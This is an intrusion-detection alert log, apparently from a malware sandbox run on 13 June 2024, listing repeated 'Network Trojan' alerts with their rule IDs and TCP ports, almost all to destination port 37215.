              Timestamp:06/13/24-21:32:42.418982
              SID:2835222
              Source Port:49662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.823475
              SID:2829579
              Source Port:36046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697683
              SID:2835222
              Source Port:51090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420114
              SID:2835222
              Source Port:59294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262194
              SID:2829579
              Source Port:42006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269801
              SID:2829579
              Source Port:51088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803005
              SID:2835222
              Source Port:45976
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.219877
              SID:2835222
              Source Port:57786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783425
              SID:2835222
              Source Port:34618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242721
              SID:2835222
              Source Port:40810
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305882
              SID:2835222
              Source Port:47906
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.439065
              SID:2835222
              Source Port:50610
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659111
              SID:2829579
              Source Port:33844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.784649
              SID:2829579
              Source Port:57926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298581
              SID:2835222
              Source Port:52084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.092117
              SID:2835222
              Source Port:44590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.131741
              SID:2835222
              Source Port:36214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.938171
              SID:2829579
              Source Port:46964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480563
              SID:2835222
              Source Port:46088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871519
              SID:2835222
              Source Port:60764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.730124
              SID:2835222
              Source Port:57926
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220725
              SID:2829579
              Source Port:38170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695168
              SID:2829579
              Source Port:32932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509309
              SID:2829579
              Source Port:56484
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.198226
              SID:2829579
              Source Port:56362
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752244
              SID:2835222
              Source Port:36504
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220283
              SID:2829579
              Source Port:54064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156977
              SID:2835222
              Source Port:37404
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215806
              SID:2829579
              Source Port:41762
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.748582
              SID:2829579
              Source Port:33708
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545074
              SID:2835222
              Source Port:47440
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.696549
              SID:2835222
              Source Port:46040
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.094538
              SID:2835222
              Source Port:60782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.419991
              SID:2829579
              Source Port:58388
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173513
              SID:2829579
              Source Port:57168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108284
              SID:2829579
              Source Port:46546
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272541
              SID:2835222
              Source Port:52492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.305079
              SID:2829579
              Source Port:37264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.277763
              SID:2829579
              Source Port:52870
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.942034
              SID:2835222
              Source Port:39056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.952368
              SID:2829579
              Source Port:45730
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042564
              SID:2835222
              Source Port:51460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.095599
              SID:2829579
              Source Port:37446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.678534
              SID:2829579
              Source Port:52210
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.159563
              SID:2829579
              Source Port:43818
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.243152
              SID:2829579
              Source Port:45150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.377149
              SID:2835222
              Source Port:38964
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.633759
              SID:2835222
              Source Port:57908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.612587
              SID:2835222
              Source Port:40176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153585
              SID:2829579
              Source Port:49218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.474945
              SID:2829579
              Source Port:32908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.350370
              SID:2829579
              Source Port:45472
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152961
              SID:2835222
              Source Port:33496
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.672139
              SID:2835222
              Source Port:51784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.614753
              SID:2829579
              Source Port:51514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.525963
              SID:2835222
              Source Port:56942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.503849
              SID:2829579
              Source Port:35418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248395
              SID:2829579
              Source Port:37944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.191432
              SID:2829579
              Source Port:50744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632326
              SID:2835222
              Source Port:38288
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.098751
              SID:2835222
              Source Port:48992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749099
              SID:2829579
              Source Port:53184
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656211
              SID:2829579
              Source Port:51386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169634
              SID:2829579
              Source Port:47908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240008
              SID:2835222
              Source Port:35200
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.138029
              SID:2829579
              Source Port:53066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.013100
              SID:2829579
              Source Port:35522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.256512
              SID:2829579
              Source Port:48916
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.986618
              SID:2829579
              Source Port:52066
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177533
              SID:2835222
              Source Port:38216
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.441016
              SID:2835222
              Source Port:56696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.785203
              SID:2829579
              Source Port:47782
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.176129
              SID:2835222
              Source Port:50002
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223900
              SID:2835222
              Source Port:58416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709782
              SID:2829579
              Source Port:60204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347439
              SID:2835222
              Source Port:45170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.940700
              SID:2829579
              Source Port:54118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.093149
              SID:2829579
              Source Port:37618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.200163
              SID:2835222
              Source Port:54366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275257
              SID:2835222
              Source Port:55302
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786853
              SID:2829579
              Source Port:35428
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987596
              SID:2835222
              Source Port:50840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344772
              SID:2835222
              Source Port:48536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181844
              SID:2835222
              Source Port:55432
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.241520
              SID:2835222
              Source Port:45962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.199995
              SID:2829579
              Source Port:44660
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060312
              SID:2829579
              Source Port:42994
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298538
              SID:2835222
              Source Port:40480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371345
              SID:2829579
              Source Port:49780
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.633428
              SID:2835222
              Source Port:35838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.509450
              SID:2829579
              Source Port:57242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608253
              SID:2835222
              Source Port:48502
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.726956
              SID:2835222
              Source Port:46920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.300352
              SID:2829579
              Source Port:52864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.782146
              SID:2829579
              Source Port:52880
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.376038
              SID:2829579
              Source Port:56908
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.347002
              SID:2835222
              Source Port:43508
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215964
              SID:2835222
              Source Port:59716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605334
              SID:2835222
              Source Port:56492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.106086
              SID:2835222
              Source Port:33574
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.280074
              SID:2835222
              Source Port:45622
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.755988
              SID:2829579
              Source Port:56746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.604098
              SID:2835222
              Source Port:38322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.262323
              SID:2835222
              Source Port:34758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407836
              SID:2829579
              Source Port:60264
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.458402
              SID:2835222
              Source Port:54394
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.783162
              SID:2835222
              Source Port:34694
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987476
              SID:2829579
              Source Port:48790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.564016
              SID:2829579
              Source Port:54406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.092029
              SID:2829579
              Source Port:49820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.042013
              SID:2829579
              Source Port:60958
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.991637
              SID:2829579
              Source Port:50876
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.485595
              SID:2829579
              Source Port:45584
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026291
              SID:2829579
              Source Port:52978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487642
              SID:2829579
              Source Port:49760
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.040960
              SID:2835222
              Source Port:34324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.943474
              SID:2829579
              Source Port:57168
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.908828
              SID:2829579
              Source Port:33242
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:43.532472
              SID:2840515
              Source Port:34096
              Destination Port:4554
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.301355
              SID:2829579
              Source Port:40104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223595
              SID:2829579
              Source Port:49920
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.418210
              SID:2829579
              Source Port:49534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.936686
              SID:2829579
              Source Port:46814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.610755
              SID:2829579
              Source Port:52960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.310604
              SID:2835222
              Source Port:48224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.192769
              SID:2835222
              Source Port:54500
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.237595
              SID:2835222
              Source Port:60744
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.025981
              SID:2835222
              Source Port:53558
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195343
              SID:2835222
              Source Port:57078
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.357601
              SID:2829579
              Source Port:41426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.341153
              SID:2829579
              Source Port:34814
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805058
              SID:2829579
              Source Port:44386
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136200
              SID:2835222
              Source Port:55946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.670530
              SID:2835222
              Source Port:35374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.257515
              SID:2829579
              Source Port:51552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.419782
              SID:2835222
              Source Port:34170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266390
              SID:2829579
              Source Port:56648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157894
              SID:2835222
              Source Port:46084
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.344454
              SID:2835222
              Source Port:54438
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075812
              SID:2829579
              Source Port:59592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.803267
              SID:2835222
              Source Port:39374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173222
              SID:2829579
              Source Port:57838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.680897
              SID:2829579
              Source Port:43732
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.779948
              SID:2835222
              Source Port:59128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.805017
              SID:2829579
              Source Port:44430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263347
              SID:2829579
              Source Port:53494
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.160377
              SID:2835222
              Source Port:38406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.194797
              SID:2829579
              Source Port:33110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.407077
              SID:2835222
              Source Port:35064
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.227136
              SID:2835222
              Source Port:41992
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316948
              SID:2835222
              Source Port:48446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656850
              SID:2835222
              Source Port:39482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.090200
              SID:2835222
              Source Port:40320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.273712
              SID:2829579
              Source Port:55012
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354202
              SID:2835222
              Source Port:47866
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.992194
              SID:2829579
              Source Port:41446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824074
              SID:2835222
              Source Port:60668
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.786802
              SID:2835222
              Source Port:43826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.038329
              SID:2835222
              Source Port:44080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546377
              SID:2829579
              Source Port:57080
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.436997
              SID:2829579
              Source Port:47262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.752335
              SID:2829579
              Source Port:45114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655974
              SID:2835222
              Source Port:47722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554254
              SID:2829579
              Source Port:39046
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.017157
              SID:2835222
              Source Port:36208
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.659525
              SID:2829579
              Source Port:44864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728646
              SID:2829579
              Source Port:59268
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.488903
              SID:2829579
              Source Port:47016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222481
              SID:2829579
              Source Port:47170
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.911151
              SID:2829579
              Source Port:40716
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.181001
              SID:2829579
              Source Port:36158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.403743
              SID:2829579
              Source Port:42624
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.027536
              SID:2829579
              Source Port:34832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.323137
              SID:2829579
              Source Port:47572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.554838
              SID:2829579
              Source Port:51978
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.131299
              SID:2829579
              Source Port:43322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.177305
              SID:2835222
              Source Port:46796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.475279
              SID:2829579
              Source Port:41812
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060727
              SID:2835222
              Source Port:60062
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.989207
              SID:2835222
              Source Port:59552
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.340220
              SID:2829579
              Source Port:39820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.134406
              SID:2829579
              Source Port:33480
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.507348
              SID:2835222
              Source Port:47214
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.212973
              SID:2829579
              Source Port:49490
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545672
              SID:2829579
              Source Port:51238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.152411
              SID:2829579
              Source Port:35482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888792
              SID:2829579
              Source Port:60352
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.123959
              SID:2835222
              Source Port:36890
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.240921
              SID:2835222
              Source Port:45054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.487221
              SID:2835222
              Source Port:47456
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.156047
              SID:2829579
              Source Port:50286
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.638360
              SID:2829579
              Source Port:46526
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.972802
              SID:2829579
              Source Port:42802
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.630295
              SID:2829579
              Source Port:56392
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102257
              SID:2835222
              Source Port:34238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.459991
              SID:2829579
              Source Port:57698
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.111621
              SID:2829579
              Source Port:50158
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.039833
